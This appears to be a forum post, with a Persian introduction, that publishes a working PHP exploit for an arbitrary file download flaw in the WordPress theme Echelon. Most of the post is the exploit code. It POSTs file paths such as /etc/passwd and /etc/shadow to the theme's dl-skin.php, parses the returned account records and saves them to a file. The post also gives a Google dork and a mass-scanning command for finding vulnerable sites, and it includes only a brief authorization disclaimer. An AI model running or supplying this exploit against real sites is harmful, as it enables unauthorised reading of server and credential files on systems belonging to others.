باگ Arbitrary File Download (A.F.D) در تم وردپرس Echelon: فایل lib/scripts/dl-skin.php این تم، مقدار پارامتر POST به نام _mysite_download_skin را بدون اعتبارسنجی به‌عنوان مسیر فایل می‌خواند؛ در نتیجه مهاجم بدون احراز هویت می‌تواند هر فایلی را که کاربر وب‌سرور اجازه خواندن آن را دارد (برای نمونه /etc/passwd) از سرور دانلود کند:
کد:
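[php]*Name:* Wordpress A.F.D Theme Echelon / INURL - BRASIL
*Description:* This exploit lets an unauthenticated attacker download any file the web-server account can READ (not "writable" - the script only reads). /etc/passwd is normally world-readable; /etc/shadow normally is not, so a hit on it indicates a badly misconfigured host.
*Usage info:* Put the path of the file in the file field of the exploit, then click "Download" and the file is returned directly.
The flaw is an unvalidated $_POST parameter in /wp-content/themes/echelon/lib/scripts/dl-skin.php (the value is used as a file path; inferred from the working payload, the theme source is not reproduced here).
The following fields are exploited for Arbitrary File Download:
*POST:* _mysite_download_skin={$config['file']}&submit=Download
ex: _mysite_download_skin=/etc/passwd&submit=Download
*Exploit:*
<?php
#===============================================================================
# NAME: Wordpress A.F.D Theme Echelon
# TYPE: Arbitrary File Download
# Google DORK: inurl:/wp-content/themes/echelon
# Vendor: www.wordpress.org
# Tested on: Linux
# EXECUTE: php exploit.php www.alvo.com.br      (or php exploit.php https://www.alvo.com.br/blog)
# OUTPUT: EXPLOIT_WPAFD_Echelon.txt   <- contains the downloaded files (passwd/shadow records);
#                                        treat as credential material, destroy per engagement rules.
# AUTHOR: Cleiton Pinheiro
# Blog: http://blog.inurl.com.br
# Twitter: https://twitter.com/googleinurl
# Fanpage: https://fb.com/InurlBrasil
# GIT: https://github.com/googleinurl
# YOUTUBE https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
#
# Use only against systems you have written authorization to test.
# ------------------------------------------------------------------------------
# Command Exec Scanner INURLBR:
# ./inurlbr.php --dork 'inurl:/wp-content/themes/echelon' -q 1,6 -s save.txt --comand-all "php exploit.php _TARGET_"
# ------------------------------------------------------------------------------
# Download Scanner INURLBR:
# https://github.com/googleinurl/SCANNER-INURLBR
#===============================================================================

// The original used error_reporting(1) (E_ERROR only), which hid the undefined-variable
// warnings ($postDados_format, $line) fixed below. Report everything now.
error_reporting(E_ALL);
ini_set('display_errors', 1);
set_time_limit(0);
ini_set('max_execution_time', 0);
// allow_url_fopen is not needed (curl is used) and is PHP_INI_SYSTEM anyway, so the
// original ini_set() was a silent no-op; dropped.
ob_implicit_flush(true);
// ob_end_flush() on the CLI with no active buffer raises a notice; flush only if one exists.
if (ob_get_level() > 0) {
    ob_end_flush();
}
// PHP 5.x warns on date() without a configured timezone; the timestamps are only log markers.
if (!ini_get('date.timezone')) {
    date_default_timezone_set('UTC');
}

if (empty($argv[1])) {
    exit('0x[ERROR]: DEFINA URL / Execute: php exploit.php www.alvo.com.br');
}

/**
 * Normalise the command-line target into "scheme://host[:port][/path]".
 *
 * Accepts "www.host" (http:// is assumed), "http://host" or "https://host/blog".
 * The path is preserved so WordPress installs in a sub-directory are reachable; the
 * original regex kept only the host and also injected a space after "http://", which
 * made every target that did not start with "www." fail with the usage error.
 *
 * @param string $raw  the argv value
 * @return string|false  base URL without trailing slash, or false if no http(s) host could be parsed
 */
function __normalize_target($raw) {
    $raw = trim($raw);
    if (!preg_match('#^[a-z][a-z0-9+.-]*://#i', $raw)) {
        $raw = "http://{$raw}";
    }
    $parts = parse_url($raw);
    if ($parts === false || empty($parts['host'])) {
        return false;
    }
    $scheme = isset($parts['scheme']) ? strtolower($parts['scheme']) : 'http';
    if ($scheme !== 'http' && $scheme !== 'https') {
        return false;
    }
    $base = $scheme . '://' . $parts['host'];
    if (isset($parts['port'])) {
        $base .= ':' . $parts['port'];
    }
    if (isset($parts['path'])) {
        $base .= rtrim($parts['path'], '/');
    }
    return $base;
}

$config = array();
$config['alvo'] = __normalize_target($argv[1]);
if ($config['alvo'] === false) {
    exit('0x[ERROR]: DEFINA URL / Execute: php exploit.php www.alvo.com.br');
}
$config['line'] = "\n------------------------------------------------------------------------------------------------------------------\n";
$config['exploit'] = "/wp-content/themes/echelon/lib/scripts/dl-skin.php";

/**
 * Push pending output to the terminal immediately (progress lines are printed while curl blocks).
 */
function __plus() {
    if (ob_get_level() > 0) {
        ob_flush();
    }
    flush();
}

/**
 * Split "a=b&c=d" into array('a' => 'b', 'c' => 'd') with URL-encoded values.
 *
 * Kept for compatibility; __request_info() now builds its body with http_build_query().
 * Values may themselves contain "=" (explode limit 2) and a key with no value maps to ''.
 *
 * @param string $query
 * @return array<string,string>
 */
function __convertUrlQuery($query) {
    $params = array();
    foreach (explode('&', $query) as $param) {
        $item = explode('=', $param, 2);
        $params[$item[0]] = urlencode(isset($item[1]) ? $item[1] : '');
    }
    return $params;
}

/**
 * POST the file-download payload to dl-skin.php and return the raw response.
 *
 * @param resource|CurlHandle $curl   handle from curl_init(); closed before returning
 * @param array $config               needs 'alvo' (base URL), 'exploit' (script path), 'file' (path to fetch)
 * @return array  'corpo'  => full raw response (headers + body), '' on transport error
 *                'body'   => response body only (headers stripped via CURLINFO header_size)
 *                'server' => curl_getinfo() array
 *                'info'   => one-line summary: status line, Server: and Content-Disposition: headers
 *                'error'  => curl error string, '' on success
 */
function __request_info($curl, $config) {
    $post = http_build_query(array(
        '_mysite_download_skin' => $config['file'],
        'submit'                => 'Download',
    ));
    $url = $config['alvo'] . $config['exploit'];
    // Randomised UA as in the original: noise for naive log filters, not WAF evasion.
    $ua = 'Mozilla/' . rand(1, 20) . '.0 (X11; Linux x8' . rand(1, 20) . '_6' . rand(1, 20)
        . ') blog.inurl.com.br/' . md5(rand(1, 200)) . '.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/'
        . rand(1, 500) . '.31';
    curl_setopt_array($curl, array(
        CURLOPT_URL            => $url,
        CURLOPT_POST           => true,
        CURLOPT_POSTFIELDS     => $post,
        CURLOPT_USERAGENT      => $ua,
        CURLOPT_REFERER        => $url,
        // The target's TLS identity is not under test and self-signed certs are common on the
        // hosts being scanned; the original set VERIFYHOST=0 alone, which still failed on them.
        // Note this also means an interposed proxy between scanner and target goes unnoticed.
        CURLOPT_SSL_VERIFYHOST => 0,
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_CONNECTTIMEOUT => 20,
        // set_time_limit(0) plus no transfer timeout let one stalled target hang the whole scan.
        CURLOPT_TIMEOUT        => 60,
        CURLOPT_HEADER         => true,
        CURLOPT_RETURNTRANSFER => true,
    ));
    $corpo = curl_exec($curl);
    $error = ($corpo === false) ? curl_error($curl) : '';
    $server = curl_getinfo($curl);
    $headerSize = isset($server['header_size']) ? (int) $server['header_size'] : 0;
    curl_close($curl);

    if ($corpo === false) {
        // The original returned the failed transfer as "not vulnerable"; report it as an error instead.
        return array('corpo' => '', 'body' => '', 'server' => $server, 'info' => "[ERROR] {$error}", 'error' => $error);
    }

    $headers = substr($corpo, 0, $headerSize);
    $body = (string) substr($corpo, $headerSize);
    $summary = array();
    foreach (array('#^(HTTP/[^\r\n]*)#m', '#^(Server:[^\r\n]*)#mi', '#^(Content-Disposition:[^\r\n]*)#mi') as $re) {
        if (preg_match($re, $headers, $m)) {
            $summary[] = $m[1];
        }
    }
    return array(
        'corpo'  => $corpo,
        'body'   => $body,
        'server' => $server,
        'info'   => implode(', ', $summary),
        'error'  => '',
    );
}

/**
 * Decide whether the response is a real passwd/shadow-style file and record it.
 *
 * The original matched the bare word "root" anywhere in the raw response (headers included),
 * which fires on any WordPress page whose HTML carries ":root" CSS and therefore flagged every
 * reachable site as vulnerable. A hit now requires a line starting with "root:" followed by at
 * least two more colon-separated fields, which holds for both /etc/passwd ("root:x:0:0:...")
 * and /etc/shadow ("root:$6$...:19000:...") but not for HTML.
 *
 * Side effect: on a hit, every account record in the body is appended to EXPLOIT_WPAFD_Echelon.txt
 * (the original saved only root/sbin/ftp/nobody/mail lines). That file holds credential material
 * from the target - handle and destroy it according to the engagement's rules of evidence.
 *
 * @param array $config  needs 'file', 'line', 'alvo'
 * @param array $rest    return value of __request_info()
 */
function main($config, $rest) {
    __plus();
    // date("h:m:s") in the original printed the MONTH in place of minutes; "H:i:s" is hours:minutes:seconds.
    print "0x " . date("H:i:s") . " [INFO][EXPLOITATION THE FILE]: {$config['file']}:\n";
    if (!empty($rest['error'])) {
        print "0x " . date("H:i:s") . " [ERROR][REQUEST FAILED]: {$rest['error']}\n";
        return;
    }
    $body = isset($rest['body']) ? $rest['body'] : $rest['corpo'];
    if (!preg_match('/^root:[^:\r\n]*:[^:\r\n]*:/m', $body)) {
        print "0x " . date("H:i:s") . " [INFO][NOT VULN]\n";
        return;
    }
    // One record per line: name:field:field:... ("$" allowed in names for Samba machine accounts).
    preg_match_all('/^[A-Za-z_][A-Za-z0-9_.$-]*:[^:\r\n]*:[^:\r\n]*:[^\r\n]*/m', $body, $records);
    $res = "0x " . date("H:i:s") . " [INFO][IS VULN][RESUME][VALUES]:\n";
    $res .= $config['line'] . "\n";
    foreach ($records[0] as $value) {
        $res .= "0x " . date("H:i:s") . " [VALUE]: {$value}\n";
    }
    $res .= $config['line'];
    __plus();
    if (file_put_contents('EXPLOIT_WPAFD_Echelon.txt', "{$config['alvo']}\n{$res}\n", FILE_APPEND) === false) {
        print "0x " . date("H:i:s") . " [ERROR]: could not write EXPLOIT_WPAFD_Echelon.txt\n";
    }
    print "{$res}[VALUES SAVED]: EXPLOIT_WPAFD_Echelon.txt\n\n";
}

print "\r\n0x[EXPLOIT NAME]: Wordpress A.F.D Theme Echelon / INURL - BRASIL\n";
// /etc/passwd is world-readable on practically every Linux host, so it proves the read primitive.
$config['file'] = '/etc/passwd';
$rest = __request_info(curl_init(), $config);
__plus();
// The original printed the undefined $line here; the separator lives in $config['line'].
print $config['line'];
print "0x " . date("H:i:s") . " [INFO]: {$rest['info']}\n";
print "0x " . date("H:i:s") . " [INFO][TARGET]: {$config['alvo']}\n";
main($config, $rest);
__plus();
// /etc/shadow is normally readable by root only; a hit here means the web server runs as root or
// the host is otherwise misconfigured, so "NOT VULN" on this probe does not clear the target.
$config['file'] = '/etc/shadow';
$rest = __request_info(curl_init(), $config);
__plus();
main($config, $rest);
__plus();
[/php]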